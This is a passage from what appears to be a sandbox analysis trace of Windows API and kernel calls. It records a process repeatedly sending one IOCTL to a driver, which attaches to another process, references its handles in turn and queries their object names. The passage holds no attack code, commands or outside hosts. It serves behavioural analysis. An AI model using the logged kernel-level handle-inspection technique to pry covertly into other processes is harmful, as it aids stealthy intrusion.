PsReleaseProcessExitSynchronization () returned 0x2 [0224.405] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.405] ObQueryNameString (in: Object=0xfffffa8003926700, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.405] ObfDereferenceObject (Object=0xfffffa8003926700) returned 0x11 [0224.405] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.405] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.405] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.405] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.405] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.405] PsAcquireProcessExitSynchronization () returned 0x0 [0224.405] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.405] ObReferenceObjectByHandle (in: Handle=0x664, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039be920, HandleInformation=0x0) returned 0x0 [0224.405] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.406] PsReleaseProcessExitSynchronization () returned 0x2 [0224.406] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.406] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.406] ObfDereferenceObject (Object=0xfffffa80039be920) returned 0x1 [0224.406] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.406] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.406] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.406] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.406] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.406] PsAcquireProcessExitSynchronization () returned 0x0 [0224.406] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.406] ObReferenceObjectByHandle (in: Handle=0x69c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003925a30, HandleInformation=0x0) returned 0x0 [0224.406] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.406] PsReleaseProcessExitSynchronization () returned 0x2 [0224.406] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.406] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.406] ObfDereferenceObject (Object=0xfffffa8003925a30) returned 0x1 [0224.406] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.406] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.406] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.406] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.406] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.406] PsAcquireProcessExitSynchronization () returned 0x0 [0224.406] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.406] ObReferenceObjectByHandle (in: Handle=0x6ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013f0c50, HandleInformation=0x0) returned 0x0 [0224.406] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.407] PsReleaseProcessExitSynchronization () returned 0x2 [0224.407] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.407] ObQueryNameString (in: Object=0xfffff8a0013f0c50, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.407] ObfDereferenceObject (Object=0xfffff8a0013f0c50) returned 0x2 [0224.407] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.407] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.407] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.407] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0224.407] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.407] PsAcquireProcessExitSynchronization () returned 0x0 [0224.407] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.407] ObReferenceObjectByHandle (in: Handle=0x6c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800a871dd0, HandleInformation=0x0) returned 0x0 [0224.407] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.407] PsReleaseProcessExitSynchronization () returned 0x2 [0224.407] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.407] ObQueryNameString (in: Object=0xfffffa800a871dd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.407] ObfDereferenceObject (Object=0xfffffa800a871dd0) returned 0x1 [0224.407] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.407] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.407] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.407] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0224.407] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.407] PsAcquireProcessExitSynchronization () returned 0x0 [0224.407] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.408] ObReferenceObjectByHandle (in: Handle=0x6c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a7e650, HandleInformation=0x0) returned 0x0 [0224.408] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.408] PsReleaseProcessExitSynchronization () returned 0x2 [0224.408] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.408] ObQueryNameString (in: Object=0xfffffa8003a7e650, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.408] ObfDereferenceObject (Object=0xfffffa8003a7e650) returned 0x1 [0224.408] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.408] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.408] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.408] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.408] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.408] PsAcquireProcessExitSynchronization () returned 0x0 [0224.408] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.408] ObReferenceObjectByHandle (in: Handle=0x6d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0013b6060, HandleInformation=0x0) returned 0x0 [0224.408] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.408] PsReleaseProcessExitSynchronization () returned 0x2 [0224.408] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.408] ObQueryNameString (in: Object=0xfffff8a0013b6060, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.408] ObfDereferenceObject (Object=0xfffff8a0013b6060) returned 0x1 [0224.408] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.408] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.408] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.409] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0224.409] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.409] PsAcquireProcessExitSynchronization () returned 0x0 [0224.409] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.409] ObReferenceObjectByHandle (in: Handle=0x6e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a49370, HandleInformation=0x0) returned 0x0 [0224.409] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.409] PsReleaseProcessExitSynchronization () returned 0x2 [0224.409] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.409] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.409] ObfDereferenceObject (Object=0xfffffa8003a49370) returned 0x1 [0224.409] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.409] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.409] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.409] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.409] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.409] PsAcquireProcessExitSynchronization () returned 0x0 [0224.409] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.409] ObReferenceObjectByHandle (in: Handle=0x70c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010e1780, HandleInformation=0x0) returned 0x0 [0224.409] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.409] PsReleaseProcessExitSynchronization () returned 0x2 [0224.409] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.409] ObQueryNameString (in: Object=0xfffff8a0010e1780, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.409] ObfDereferenceObject (Object=0xfffff8a0010e1780) returned 0x1 [0224.409] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.410] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.410] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.410] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.410] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.410] PsAcquireProcessExitSynchronization () returned 0x0 [0224.410] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.410] ObReferenceObjectByHandle (in: Handle=0x718, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f89ea0, HandleInformation=0x0) returned 0x0 [0224.410] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.410] PsReleaseProcessExitSynchronization () returned 0x2 [0224.410] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.410] ObQueryNameString (in: Object=0xfffff8a000f89ea0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.410] ObfDereferenceObject (Object=0xfffff8a000f89ea0) returned 0x1 [0224.410] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.410] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.410] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.410] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.410] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.410] PsAcquireProcessExitSynchronization () returned 0x0 [0224.410] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.410] ObReferenceObjectByHandle (in: Handle=0x720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c876e0, HandleInformation=0x0) returned 0x0 [0224.410] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.410] PsReleaseProcessExitSynchronization () returned 0x2 [0224.410] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.410] ObQueryNameString (in: Object=0xfffff8a000c876e0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.410] ObfDereferenceObject (Object=0xfffff8a000c876e0) returned 0x1 [0224.410] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.411] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.411] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.411] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.411] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.411] PsAcquireProcessExitSynchronization () returned 0x0 [0224.411] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.411] ObReferenceObjectByHandle (in: Handle=0x728, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000c43af0, HandleInformation=0x0) returned 0x0 [0224.411] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.411] PsReleaseProcessExitSynchronization () returned 0x2 [0224.411] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.411] ObQueryNameString (in: Object=0xfffff8a000c43af0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.411] ObfDereferenceObject (Object=0xfffff8a000c43af0) returned 0x1 [0224.411] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.411] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.411] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.411] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.411] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.411] PsAcquireProcessExitSynchronization () returned 0x0 [0224.411] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.411] ObReferenceObjectByHandle (in: Handle=0x72c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800bb1cbc0, HandleInformation=0x0) returned 0x0 [0224.411] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.411] PsReleaseProcessExitSynchronization () returned 0x2 [0224.411] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.411] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.412] ObfDereferenceObject (Object=0xfffffa800bb1cbc0) returned 0x1 [0224.412] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.412] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.412] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.412] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.412] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.412] PsAcquireProcessExitSynchronization () returned 0x0 [0224.412] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.412] ObReferenceObjectByHandle (in: Handle=0x738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00146e250, HandleInformation=0x0) returned 0x0 [0224.412] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.412] PsReleaseProcessExitSynchronization () returned 0x2 [0224.412] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.412] ObQueryNameString (in: Object=0xfffff8a00146e250, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.412] ObfDereferenceObject (Object=0xfffff8a00146e250) returned 0x1 [0224.412] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.412] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.412] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.412] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0224.412] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.412] PsAcquireProcessExitSynchronization () returned 0x0 [0224.412] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.412] ObReferenceObjectByHandle (in: Handle=0x73c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fa4400, HandleInformation=0x0) returned 0x0 [0224.412] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.412] PsReleaseProcessExitSynchronization () returned 0x2 [0224.412] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.413] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.413] ObfDereferenceObject (Object=0xfffffa8001fa4400) returned 0x1 [0224.413] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.413] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.413] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.413] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.413] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.413] PsAcquireProcessExitSynchronization () returned 0x0 [0224.413] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.413] ObReferenceObjectByHandle (in: Handle=0x740, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00183fe90, HandleInformation=0x0) returned 0x0 [0224.413] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.413] PsReleaseProcessExitSynchronization () returned 0x2 [0224.413] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.413] ObQueryNameString (in: Object=0xfffff8a00183fe90, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.413] ObfDereferenceObject (Object=0xfffff8a00183fe90) returned 0x1 [0224.413] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.413] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.413] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.413] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, 